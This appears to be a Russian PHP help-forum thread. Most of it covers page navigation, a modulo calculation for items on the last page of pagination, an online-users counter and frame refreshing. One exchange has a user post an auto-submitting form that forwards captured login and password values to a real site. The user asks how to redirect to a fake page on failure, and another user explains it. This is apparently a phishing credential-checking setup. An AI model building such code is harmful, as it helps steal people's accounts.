Ребят, я хотел бы узнать, как можно реализовать примерно такую сраничку на php >> http://razor1911.com/demo/ Буду рад даже запросу в гугл %) алсо не знаю даже что искать.
ну там движок стоит, походу самописный...довольно простой, написать такой день-два. Если ты имеешь ввиду навигацию, то тут всё просто: PHP: <?php if($_GET['menu'] == 'products') { #Контент страницы products } elseif($_GET['menu'] == 'contacts') { #Контент страницы контактов } else { #Контент главной страницы } ?> Простейший пример. Если хочешь подробнее о такой навигации то почитай про гет запросы. Или ты имел ввиду что-то другое?
Всем привед. Давненько не задавал вопросов, сейчас появился. Вроде всё просто а допереть не могу. Задача для 5-го класса школы)) В БД есть N-ное количество новостей, эти новости выводятся с постраничной навигацией по 5 на страницу (возможно любое число). Нужно определить сколько новостей вывелось на последней странице и если оно равно 5 (кол-ву новостей на каждой странице), то сделать определённое действие. Пример: Всего новостей 21, выводится 5 новостей на страницу. Из этого получается что всего страниц генерится 5, а на самой последней странице 1 новость. PHP: $on_page = 5; //Сообщений на страницу $all_posts = mysql_query(...); //Всего постов $all_pages = intva(($all_posts - 1) / $on_page) + 1; //Всего страниц А дальше не могу понять что на что делить ппц детсад, а я не могу врубиться...
это не совсем детсад, это проходят на курсе Теории чисел во втором семестре. это сравнимость, делимость и остатки. например, 1 сравнима с 7 по модулю 2. тоесть и 1, и 7 при деление на 2 дает остаток 1.
Енот, это решается просто sql запросами с limit'ом, то есть PHP: if(isset($_GET['page'])) {$limit=(intval($_GET['page']))*5;} else { $limit=0; } $q='select * from news order by id limit '.$limit.',5'; Я правильно понял?
О, Макро привет)) Неа, не правильно понял. Щас попробую сформулировать по другому. Мне нужно именно сколько новостей влезло на последнюю страницу...просто как математический рассчё, ну или статистика как ещё назвать. Щас попробую сформулировать алгоритм кода. (Это не постраничная навигация!) -Количество новостей на страницу 5 -Запрашиваем количество новостей в базе (для примера их там 21) -Получаем количество страниц на которые это дело выводится, в данном случае получается 5 -Далее нужно вычислить сколько новостей влезло на самую последнюю страницу. В данном случае на последней странице у нас будет 1 сообщение, т.к. на остальные 4 страницы влезло по 5 сообщений как и требовалось. Вот самое последнее действие не могу осилить =\
может, $all_posts-intval($all_posts/5)*5 PHP: $all_posts=21; $posts_per_page=5; echo($all_posts-intval($all_posts/$posts_per_page)*$posts_per_page); Вывело 1
Странные вы... PHP: $onlastpage = $all % 5 если $onlastpage === 0, то это значит что у нас есть $all/5 заполненных страниц, иначе floor($all/5) + 1
Всем спасибо всё работает. По коду Макро доделал и всё заработало нормально, потом обновил страницу, DesTiny выложил более короткий код....незнаю теперь чё выбрать
sky7, для этого нужно считывать данные зашедшего на страничку, и записывать их и текущее время в файл/бд если они не совпадают. А если совпадают, то записывать только время. Ну и надо проверять устаревшие записи, по установленному таймауту, чаще всего минут 5-10.
какой код нада добавить чтоб при неверной паре логин/пас происходил возврат на фейк страницу? <html> <body onload=submitform()> <form method='post' name='login' id='login' action='http://cayt.ru/login.php'> <input type='hidden' name='success_url' id='success_url' value=''> <input type='hidden' name='fail_url' id='fail_url' value=''> <input type='hidden' name='try_to_login' id='try_to_login' value='1'> <input type='hidden' name='email' value='$login'> <input type='hidden' name='pass' value='$password'> </form> <script type='text/javascript'>document.login.submit();</script> </body> </html>"; ?>
opy495 послать запрос авторизации с введенными данными. если в ответе есть строка, которая говорит о невалидной паре логин-пасс, то header('Location: http://www.fake.com/fake.html');
есть 2 фрейма, как сделать чтоб при нажатии кнопки в первом фрейме обновить страничку второго фрейма?
astrologer , И куда это записать, чтоб обновился фрейм при нажатии этой кнопки: <INPUT TYPE="Submit" Value="Enter">
я привык писать... И оно вроде как бы положено по спецификации... Во всяком случае, я люблю чёткую структуру